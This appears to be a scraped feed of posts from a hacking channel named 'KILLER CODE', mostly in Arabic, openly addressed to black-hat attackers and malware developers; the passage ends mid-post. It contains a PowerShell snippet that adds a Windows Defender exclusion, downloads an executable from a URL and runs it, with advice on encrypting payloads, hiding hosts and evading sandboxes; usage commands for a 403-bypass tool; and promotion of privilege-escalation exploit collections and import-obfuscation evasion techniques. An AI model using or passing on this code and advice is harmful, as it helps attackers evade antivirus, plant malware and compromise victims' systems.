CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":307},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/159","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/159","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/159","headline":"4-ZERO-3 : Is A Tool Used To Bypass 403/401 By Methods 🍽, Script will print cURL PAYLOAD if possible bypass f…","articleBody":"4-ZERO-3 : Is A Tool Used To Bypass 403/401 By Methods 🍽, Script will print cURL PAYLOAD if possible bypass found😈\n\nLink :🔗 https://github.com/Dheerajmadhukar/4-ZERO-3.git\n\nSetup😈:\n\ngit clone https://github.com/Dheerajmadhukar/4-ZERO-3.git\ncd 4-ZERO-3\nchmod +x 403-bypass.sh\n./403-bypass.sh -h \n\nUsage😀:\n\n./403-bypass.sh -u https://google.com/.htaccess —exploit","datePublished":"2024-11-23T14:35:35Z","dateModified":"2024-11-23T14:35:35Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":310},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/158","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/158","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/158","headline":"Add-MpPreference -ExclusionPath $env:USERPROFILE\\Downloads $url = 'Your URL' $outputFile = [System.IO.Path]::…","articleBody":"Add-MpPreference -ExclusionPath $env:USERPROFILE\\Downloads\n$url = 'Your URL'\n$outputFile = [System.IO.Path]::Combine($env:USERPROFILE, 'Downloads', 'NAME.exe')\n\n# Wait until the exclusion is confirmed (just a safeguard, usually it happens instantly)\nStart-Sleep -Milliseconds 100 \n\n# Download the file\nInvoke-WebRequest -Uri $url -OutFile $outputFile\n\n# Run the downloaded file after the download is complete\nStart-Process -FilePath $outputFile\n\n\nالكود المكتوب هنا هو مثال لتقنية بيتم استخدامها بشكل متكرر في عالم المالوير والاختراق علشان يتخطى بيها المخترقين برامج الحماية الموجودة على أجهزة الضحايا باستخدام الـ PowerShell اللي هو جزء أساسي من أنظمة ويندوز الكود ده بيبدأ باستخدام أمر Add-MpPreference واللي وظيفته إنه يضيف مسار معين لقائمة الاستثناءات في برنامج الحماية Windows Defender بمعنى إنه بيقول للبرنامج إنه المسار ده آمن وما فيش داعي لفحصه الخطوة دي بتتطلب صلاحيات مسؤول على الجهاز وبمجرد نجاحها أي ملف أو عملية داخل المسار المستثنى مش هيتفحصه برنامج الحماية وده ثغرة خطيرة المخترق بيستغلها علشان يخفي المالوير بتاعه وبعد كده السطر التاني بيمثل تعريف لعنوان URL اللي بيحتوي على ملف المالوير اللي المفترض يتم تحميله والملف ده بيتم تنزيله وتخزينه في مجلد التنزيلات الخاص بالمستخدم عن طريق تحديد مسار الملف باستخدام [System.IO.Path] اللي هي دالة بتجمع بين الـ USERPROFILE اللي هي المسار الرئيسي للمستخدم في الويندوز وبين اسم الملف اللي هو NAME.exe وده بيخلي العملية تبدو كأنها شغالة بشكل طبيعي في النظام السطر اللي بعده بيضيف مهلة قصيرة باستخدام Start-Sleep علشان يتأكد إن الاستثناء تم تطبيقه بالكامل قبل تنفيذ أي عملية أخرى بعد كده Invoke-WebRequest بيقوم بتحميل الملف من الـ URL المحدد وبيحفظه في المسار اللي تم تحديده مسبقاً وبعد انتهاء عملية التحميل Start-Process بيبدأ في تنفيذ الملف اللي تم تنزيله وده بيشغل المالوير مباشرة على الجهاز الهدف من غير ما برامج الحماية تقدر تتعرف عليه أو تعترضه \n\nللمخترقين أو مطوري المالوير الكود ده بيتم استخدامه بطرق مختلفة وذكية لزيادة فرصة نجاح العملية أولاً المالوير بيكون مشفر علشان ما يتمش اكتشافه بسهولة ويفضل استخدام تشفير متعدد الطبقات علشان يزيد من صعوبة تحليله من قبل محللي الحماية ثانياً الـ URL المستخدم لتحميل المالوير بيكون في العادة مختصر أو مخفي باستخدام تقنيات زي الـ Fast Flux علشان يصعب تتبعه ثالثاً عملية تنفيذ المالوير بتتم بعد التأكد من إن النظام ما فيهش آليات مراقبة إضافية زي برامج Sandbox أو برامج الحماية الإضافية زي Kaspersky أو Norton وبالنسبة للباحثين الأمنيين اللي بيحاولوا فهم وتحليل الأكواد زي دي النصيحة الأهم هي استخدام بيئات افتراضية مؤمنة بالكامل زي VirtualBox أو VMware مع برامج مراقبة زي Sysmon علشان تقدر تتبع كل الخطوات اللي بيقوم بيها المالوير وكشف الثغرات اللي بيستغلها علشان تقدر توقفه\n\nالتقنية المستخدمة في الكود ده بتندرج تحت مفهوم \"Living Off The Land Binaries and Scripts\" أو اللي بتختصر بـ LOLBAS التقنية دي معناها استخدام أدوات أو أوامر موجودة أصلاً في النظام (زي PowerShell في الحالة دي) لتنفيذ هجمات أو تحميل مالوير، بدل ما يعتمد المخترق على برامج أو أدوات خارجية ممكن يتم اكتشافها بسهولة من برامج الحماية\n\nميزة LOLBAS إنها بتستغل أدوات موثوقة وموقّع عليها من الشركة المصنعة للنظام (مايكروسوفت في المثال ده) وبالتالي بتصعّب على برامج الحماية إنها تميز النشاط الضار لأن الأدوات دي بتُستخدم في الأساس لأغراض مشروعة","datePublished":"2024-11-23T14:30:34Z","dateModified":"2024-11-23T14:30:34Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":224},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":8}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/157","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/157","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/157","headline":"الكتاب اللي انا حملته \"PowerShell for Penetration Testing\" بيشرح بالتفصيل إزاي تستخدم PowerShell في اختبارات…","articleBody":"الكتاب اللي انا حملته \"PowerShell for Penetration Testing\" بيشرح بالتفصيل إزاي تستخدم PowerShell في اختبارات الاختراق وبيغطي مواضيع كتير زي استغلال الثغرات والتحكم في الأنظمة عن بُعد وبيوضح إزاي PowerShell ممكن يبقى أداة قوية لأي هكر أو مطور برامج ضارة (Malware Developer) أو مطور استغلالات (Exploit Developer) الكتاب بيعلمك إزاي تجمع معلومات عن الأنظمة والشبكات عن طريق استغلال بروتوكولات زي SNMP و SMTP و SMB وده بيساعدك في تحديد الثغرات الأمنية اللي ممكن تستغلها عشان تخترق الأنظمة الكتاب كمان بيشرح إزاي تستخدم PowerShell في إعداد وتنفيذ أوامر عن بُعد وده بيشمل التحكم في الأجهزة ونسخ الملفات عن بُعد وإنشاء حسابات جديدة وده كله بيساعدك في السيطرة على الأنظمة والشبكات بشكل كامل حاجة تانية مهمة في الكتاب هي شرح كيفية تجاوز Windows Defender وقواعد ASR باستخدام تقنيات متقدمة في PowerShell وده بيساعدك في تطوير برامج ضارة ما تتكشفش بسهولة وتقدر تعدي من الأنظمة الأمنية الكتاب كمان بيتكلم عن التعامل مع بروتوكولات البريد الإلكتروني زي SMTP وبيعلمك إزاي تستغلهم في الهجمات زي التحقق من عناوين البريد الإلكتروني وفتح الروابط المرسلة وكمان إزاي تتجنب اكتشاف الهجمات دي من الأنظمة الأمنية الحاجات دي كلها بتخليك قادر تطور مهاراتك في اختبارات الاختراق وتطوير البرامج الضارة والاستغلالات بشكل كبير وتقدر تستخدم التقنيات اللي في الكتاب ده عشان تكتسب خبرة عملية في المجال وتبقى هكر محترف الكتاب بيعلمك مهارات كتير زي الأتمتة (Automation) والتحكم في الأنظمة والشبكات وجمع المعلومات وتحليلها وتجاوز الأنظمة الأمنية وده بيخليك مستعد لأي تحدي في مجال اختبار الاختراق وتطوير البرامج الضارة والاستغلالات عشان كده تعلم PowerShell مهم جداً لأي هكر لأنه بيساعدك في القيام بمهام كتير بسهولة وفعالية وبيخليك قادر تتحكم في الأنظمة والشبكات وتستغل الثغرات الأمنية بكل احترافية الكتاب ده ممكن يطور أي هكر ويخليه قادر يحقق أهدافه بسهولة وبأقل مجهود","datePublished":"2024-11-23T13:52:21Z","dateModified":"2024-11-23T13:52:21Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":194},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/156","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/156","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/156","headline":"KILLER CODE","datePublished":"2024-11-23T13:52:21Z","dateModified":"2024-11-23T13:52:21Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":217},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":13}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/155","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/155","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/155","headline":"الكاش ميموري ببساطة هي نوع من أنواع الذاكرة اللي بتشتغل بسرعة عالية جدًا وبتكون موجودة بين البروسيسور والرام…","articleBody":"الكاش ميموري ببساطة هي نوع من أنواع الذاكرة اللي بتشتغل بسرعة عالية جدًا وبتكون موجودة بين البروسيسور والرام والهدف الأساسي منها إنها تقلل الوقت اللي البروسيسور بيحتاجه عشان يجيب البيانات اللي هيشتغل عليها البروسيسور بيحتاج بيانات بشكل مستمر عشان يعالجها لكن مش دايمًا البيانات دي بتكون قريبة منه لو اعتمد البروسيسور على إنه يجيب البيانات كلها من الرام بس ده هيأخره جدًا لأن الرام أبطأ من الكاش بكتير عشان كده الكاش بتتدخل هنا كوسيط سريع الكاش بتتخزن فيها البيانات اللي البروسيسور بيحتاجها بشكل متكرر أو متوقع قريبًا وبالتالي بدل ما يرجع للرام ويستنى الكاش بتوفرها ليه في وقت أقل وده بيعني إن أداء البروسيسور بيزيد بشكل كبير جدًا\n\nفي الكاش فيه 3 مستويات أساسية المستوى الأول اللي هو L1 وده بيكون الأصغر في الحجم لكنه الأسرع لأنه قريب جدًا من البروسيسور والمستوى الثاني L2 اللي بيكون أكبر شوية وأبطأ شوية وأخيرًا المستوى الثالث L3 اللي بيكون الأكبر في الحجم لكنه الأبطأ مقارنة بالمستويين التانيين بس برضه أسرع من الرام كتير البروسيسور لما يحتاج بيانات بيبدأ يدور عليها في الكاش من L1 الأول لو مش موجودة يدور في L2 وهكذا ولو ملقاش يرجع للرام مباشرة\n\nفي سياق استغلال الكاش ميموري للهكرز الكاش ممكن تبقى أداة مهمة جدًا لو حد عايز يطور مالوير متقدم أو يعمل استغلال معين أولًا فيه حاجة اسمها \"Cache Timing Attacks\" اللي بتعتمد على قياس الوقت اللي البروسيسور بياخده عشان يجيب بيانات معينة الهكر ممكن يستغل دي عشان يعرف إذا كانت بيانات معينة موجودة في الكاش ولا لأ وبالتالي يقدر يستنتج معلومات حساسة زي كلمات السر أو المفاتيح التشفيرية عن طريق تحليل الأنماط الزمنية دي ده بيحصل لأن الكاش بتميل تحتفظ بالبيانات اللي بتستخدمها البرامج بشكل متكرر فالهكر لو عرف يتحكم في البرنامج أو يعرف يتتبع أداؤه ممكن يستخدم الكاش كوسيلة للتجسس عليه\n\nتطوير المالوير باستخدام الكاش ميموري ممكن يتم بطرق زي إدماج تقنيات استغلال الكاش في المالوير بحيث إنه يقدر يقرأ أو يكتب بيانات بسرعة أكبر أو حتى إنه يقدر يراقب تطبيقات تانية شغالة على نفس النظام ده مفيد جدًا خصوصًا في الهجمات على الأنظمة المشتركة زي الخوادم أو الأجهزة اللي بتشغل تطبيقات مختلفة على نفس الجهاز المالوير اللي بيستغل الكاش ممكن يكون قادر على استخدام القنوات الجانبية اللي هي Side-Channel Attacks عشان يسرّب بيانات حساسة من الأنظمة المستهدفة الهكر ممكن كمان يستخدم الكاش عشان يبطّئ نظام معين أو يخليه أقل كفاءة لو استخدم تقنيات زي Cache Poisoning اللي بتعتمد على إنها تملأ الكاش ببيانات غير مفيدة وبالتالي تمنع البرامج العادية من استخدام الكاش بشكل فعال\n\nبالإضافة لكده الكاش ليها دور في تسريع بعض العمليات اللي ممكن الهكر يستغلها أثناء تطوير المالوير مثلاً المالوير اللي بيعمل على التشفير أو فك التشفير ممكن يستخدم الكاش لتخزين البيانات الوسيطة اللي بيحتاجها بشكل مستمر ده هيخليه أسرع وأصعب في الاكتشاف لأن الأداء العالي بيقلل من فرص الملاحظة من أدوات الحماية بشكل كبير لو الهكر فهم طريقة عمل الكاش كويس وعرف يديرها بشكل صحيح هيكون عنده أداة قوية جدًا سواء للهجوم أو حتى للدفاع","datePublished":"2024-11-23T13:39:50Z","dateModified":"2024-11-23T13:39:50Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":339},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/154","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/154","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/154","headline":"مشروع DRMBinViaOrdinalImports بيعتمد على تكنيك متطور في برمجة المالويرز وهو استغلال Ordinal Imports عشان يزود…","articleBody":"مشروع DRMBinViaOrdinalImports بيعتمد على تكنيك متطور في برمجة المالويرز وهو استغلال Ordinal Imports عشان يزود مستوى التخفي ضد أنظمة الحماية وتحليل البرمجيات. العادي إن المالوير لما بيحتاج يستدعي دوال من مكتبات النظام، بيستخدم أسماء واضحة زي LoadLibrary أو GetProcAddress. لكن التكنيك هنا بيبدل الأسماء دي بأرقام بترمز للدوال داخل الـ DLL (اللي هي الـ ordinals)، وده بيصعب عملية التحليل على أدوات الفحص لأن الأرقام مش بتدي فكرة مباشرة عن الوظيفة اللي بيقوم بيها المالوير. في سياق المالوير أو تطوير أدوات الاختراق، ده معناه إنك بتصعب اكتشاف الكود بتاعك سواء باستخدام التحليل الساكن أو الديناميكي و بالنسبة لفائدة المالوير ده لأي بلاك هات، هو بيخدم أكتر على مرحلة التخفي. الحماية الحديثة زي برامج مكافحة الفيروسات بتعتمد بشكل كبير على تحليل الجداول اللي بتكون موجودة في ملفات الـ PE زي Import Address Table. لما يتم استدعاء الدوال بالأرقام بدل الأسماء، ده بيعمل نوع من الـ Obfuscation اللي بيخلي من الصعب معرفة الوظائف المستدعاة. كمان، لو ضيفت مع التكنيك ده Dynamic Linking يعني تستدعي مكتبات في وقت التشغيل مش وقت التحميل، هتقلل فرصة اكتشاف المالوير أكتر و علشان مطور المالوير يدمج التقنية دي في المالوير بتاعه، لازم الأول يكون فاهم كويس جدًا طريقة عمل Import Address Table (IAT) اللي هي الجزء المسؤول عن تحميل واستدعاء دوال النظام في ملفات الـ PE. باستخدام مكتبة زي pefile، المطور يقدر يحلل الـ IAT ويعيد كتابتها علشان تستدعي الدوال باستخدام Ordinals. ده ممكن يكون مفيد جدًا لو المالوير بيحاول يتجنب توقيعات الحماية الموجودة في أنظمة مكافحة الفيروسات و لما نيجي نتكلم عن تطوير المشروع أو تحسينه، فيه أفكار كتير ممكن البلاك هات يضيفوها. مثلًا، ممكن يدمج التقنية دي مع Dynamic API Resolving ودي فكرة تعتمد على إن المالوير يستدعي الدوال بطريقة ديناميكية وقت التشغيل Runtime بدل ما تكون محددة مسبقًا في الكود. التقنية دي بتعتمد على استدعاء دوال زي LoadLibrary و GetProcAddress لتحميل مكتبات النظام والدوال المطلوبة ديناميكيًا. الفكرة دي لما تتدمج مع Ordinal Imports بتخلي المالوير أكتر تعقيدًا وصعب اكتشافه و كمان ممكن إضافة أساليب تانية زي Encryption أو Obfuscation للـ Import Table. بمعنى إن مش بس الدوال بتتحول لـ Ordinals، لكن كمان يتم تشفير الجدول بالكامل ويكون المالوير هو المسؤول عن فك التشفير وقت التشغيل. ده بيمنع أي أدوات تحليل من إنها تقرأ الـ IAT بسهولة و من ضمن الأفكار اللي ممكن تتطبق برضه هي دمج المشروع مع تقنية Reflective DLL Injection. دي تقنية بيتم فيها تحميل مكتبة DLL في ذاكرة الجهاز بدون ما يتم تسجيلها في الـ Process Address Space. لما التقنية دي تتدمج مع Ordinal Imports، المالوير هيقدر يخفي عملياته بشكل كامل تقريبًا عن أدوات المراقبة و عشان مطور المالوير يدمج التكنيك ده في كوده، لازم أول حاجة يكون عنده فهم كويس جدًا ببنية ملفات PE والـ IAT. لازم يكون عارف إزاي يعدل الجداول دي باستخدام مكتبات معالجة زي pefile في بايثون أو أدوات مباشرة زي C/C++. كمان ممكن يضيف تكنيكات تانية زي Code Injection أو Process Hollowing. يعني بدل ما المالوير يشتغل مباشرة، يحقن نفسه في عملية تانية مشبوهة ويستخدم الـ Ordinal Imports هناك عشان يزود الغموض واحد من الأفكار القوية اللي ممكن البلاك هات يدمجها مع المشروع ده هو Memory Mapping Techniques. يعني بدل ما الملفات تبقى على القرص الصلب وتتعرض للفحص، يتم تحميلها مباشرة في الذاكرة ويشتغل المالوير من هناك. مع استخدام الـ Ordinal Imports الديناميكي، بيضمن إن الكود مش هيبان بسهولة. كمان ممكن يضيف Polymorphic Code عشان يتغير شكله مع كل تنفيذ أما عن استغلال المشروع في الاختراق، فيقدر أي مهاجم يستخدمه لتطوير برمجيات Anti-Copy متقدمة، بمعنى إنه يحمي ملفات أو برامج من النسخ بطريقة خبيثة. ممكن يراقب الـ I/O الخاص بالجهاز أو يمنع عمليات النسخ باستخدام Hooking للوظائف المرتبطة بالملفات. ولو طوره أكتر ممكن يدمج فيه تكنيكات Exploits عشان يستغل نقاط الضعف في النظام أثناء تطبيق الـ DRM أخيرًا، لو بنتكلم عن تحسين الأداة دي لمستوى أعلى، المطور ممكن يدمجها مع تكنيكات زي API Hashing اللي بتستخدم الـ Hash بدل الـ ordinals أو الأسماء. ده بيعقد الكود أكتر وبيصعب اكتشافه. وكمان ممكن يضيف String Encryption عشان يخفي أي نصوص واضحة جوا الكود. الفكرة كلها إن التكنيكات دي لو اتوظفت صح هتعمل فرق كبير لأي مالوير سواء من حيث التخفي أو التنفيذ على النظام المستهدف\n\nرابط المشروع على جيت هوب","datePublished":"2024-11-23T11:50:11Z","dateModified":"2024-11-23T11:50:11Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":290},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/151","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/151","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/151","headline":"ايزي","articleBody":"ايزي","datePublished":"2024-11-22T15:51:46Z","dateModified":"2024-11-22T15:51:46Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":277},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":13},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/150","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/150","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/150","headline":"مشروع Exploit-Street هو مكتبة ضخمة مخصصة لتجميع استغلالات تصعيد الامتيازات (LPE) على أنظمة ويندوز بداية من 20…","articleBody":"مشروع Exploit-Street هو مكتبة ضخمة مخصصة لتجميع استغلالات تصعيد الامتيازات (LPE) على أنظمة ويندوز بداية من 2023 والمشروع بيتميز إنه بيقدم استغلالات مُحدثة ومُجمعة من مصادر مختلفة سواء كانت استغلالات منشورة بالفعل أو تعديلات جديدة على ثغرات قديمة ويُعتبر المشروع ده كنز لأي بلاك هات أو مطور برمجيات ضارة (Malware Developer) لأنه بيوفر بيئة و المشروع مكتوب بلغة برمجة قوية زي C++ وC وأحيانًا بيتضمن سكريبتات مكتوبة بـ PowerShell و كل حاجة فيه جاهزة لفهم واستخدام نقاط الضعف في الأنظمة المستهدفة بشكل علمي ومنظم ولما نيجي نتكلم عن الفايدة اللي ممكن يحققها البلاك هات من المشروع ده فهو بيقدر يستخدم الأكواد الجاهزة فيه لاستهداف أنظمة ويندوز وتصعيد الامتيازات للوصول إلى صلاحيات أعلى زي صلاحيات الأدمن وده بيساعد في تثبيت برمجيات ضارة أو تشغيل أوامر متقدمة على الأجهزة المستهدفة كمان المشروع ده مفيد لأي مطور مالوير لأنه بيتيح ليه فرصة دراسة الأكواد الجاهزة وتعديلها لتتناسب مع أهدافه الشخصية زي كتابة مالويرات خبيثة تستغل الثغرات الموجودة لتحقيق أهداف مختلفة زي التجسس أو تدمير البيانات أو حتى إنشاء شبكات Botnet ضخمة وممكن البلاك هات يطور المشروع ده عن طريق إضافة استغلالات جديدة تعتمد على ثغرات تم اكتشافها مؤخرًا أو إنه يحسن الأكواد الموجودة لتجاوز أنظمة الحماية زي الـAntivirus والـEDR باستخدام تقنيات مثل التشفير أو إخفاء الأكواد الخبيثة داخل عمليات شرعية وممكن كمان يدمج المشروع مع أدوات تانية زي Metasploit أو Cobalt Strike لتحقيق اختراقات متقدمة تعتمد على الربط بين أكثر من نوع استغلال وأفكار الدمج مش بتقف عند كده البلاك هات ممكن يستغل الأكواد الجاهزة في كتابة Payloads أكثر ذكاءً تستخدم تقنيات مثل DLL Injection أو Process Hollowing لتنفيذ الأكواد الضارة بدون ما يتم اكتشافها بسهولة كمان المشروع بيتيح مرونة في استخدامه لأن الأكواد المكتوبة فيه قابلة للتعديل والتطوير بسهولة باستخدام لغات زي C++ وC وده بيخلي المشروع أساس قوي لأي حد عاوز يكتب استغلالات مخصصة لأهداف معينة وفي النهاية المشروع مش مجرد مجموعة أكواد ولكنه منصة تعليمية وتجريبية لأي حد عاوز يتعمق في مجال استغلال الثغرات وتصعيد الامتيازات\n\n\nرابط المشروع على جيت هوب","datePublished":"2024-11-22T11:30:14Z","dateModified":"2024-11-22T11:30:14Z","author":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"publisher":{"@type":"Organization","name":"KILLER CODE","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90","image":"https://img.tlmtr.io/c/2HICbX/5850714629863491461?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":320},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":5},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/149","url":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/149","mainEntityOfPage":"https://telemetr.io/ru/channels/2478281357-xcode0x90/posts/149","headline":"مشروع URLFinder هو أداة مفتوحة المصدر مكتوبة بلغة Go ومصممة لاستخراج عناوين URL المخفية أو الظاهرة من النصوص…","articleBody":"مشروع URLFinder هو أداة مفتوحة المصدر مكتوبة بلغة Go ومصممة لاستخراج عناوين URL المخفية أو الظاهرة من النصوص أو الأكواد باستخدام تعبيرات منتظمة Regex وده معناه إن الأداة دي بتقدر تتعامل مع أي ملف نصي وتستخرج منه كل الروابط بغض النظر عن تعقيدها أو مكانها في النص وده بيخليها مفيدة جدًا سواء للوايت هات اللي بيستخدمها في اختبارات الاختراق وجمع المعلومات أو للبلاك هات اللي بيدور على طرق استغلال روابط حساسة أو مخفية الهدف الأساسي من URLFinder هو توفير طريقة سريعة وفعالة لتحليل ملفات ضخمة مليانة بيانات زي أكواد المصدرية أو ملفات الـ logs أو أي ملفات نصية تانية عشان تستخرج منها الروابط اللي ممكن تكون بوابة لهجمات سيبرانية زي الهجمات على صفحات مخفية أو استغلال API Endpoints أو حتى تحميل ملفات حساسة بشكل غير مصرح بيه الأداة بتشتغل من خلال أنها بتستخدم مكتبة قوية في Go بتتعامل مع النصوص وتستخرج كل الروابط اللي بتطابق الأنماط المحددة في التعبيرات المنتظمة وده بيضمن إنها بتطلع أي رابط موجود في النص بغض النظر عن مكانه أو تعقيده بالنسبة للبلاك هات فالأداة بتقدم قيمة كبيرة جدًا في مرحلة جمع المعلومات Reconnaissance لأنها بتساعدك تلاقي روابط ممكن تكون مهملة أو مش مستخدمة لكنها لسه فعالة وبالتالي ممكن تستخدمها في شن هجمات زي SQL Injection لو الرابط فيه Parameters أو XSS لو الرابط بيقبل إدخال المستخدم بدون تحقق كافي أو حتى استخدام الروابط دي في إعادة توجيه Redirect Attacks عشان توصل لصفحات ضحية أو صفحات إحتيالية تانية زي صفحات Phishing الأداة كمان ممكن تكون مفيدة لو هتستخدمها مع Web Crawlers تعمل بها مسح شامل لأي موقع على الإنترنت وتستخرج منه كل الروابط الديناميكية والستاتيكية كمان بالنسبة لتطوير الأداة ممكن تضيف مميزات زي تحليل الروابط بعد استخراجها عشان تعرف إيه الهجمات اللي ممكن تستغلها أو إضافة خاصية البحث في ملفات بصيغ أكتر زي JSON أو XML أو HTML وكمان ممكن تضيف تكامل مع أدوات زي Metasploit أو Burp Suite عشان الروابط المستخرجة تتحول تلقائيًا لاستغلالات أو محاولات هجوم لو عاوز توسع الاستفادة من الأداة أكتر ممكن تدمجها مع قاعدة بيانات تخزن فيها الروابط اللي استخرجتها وتحللها لاحقًا أو تضيف 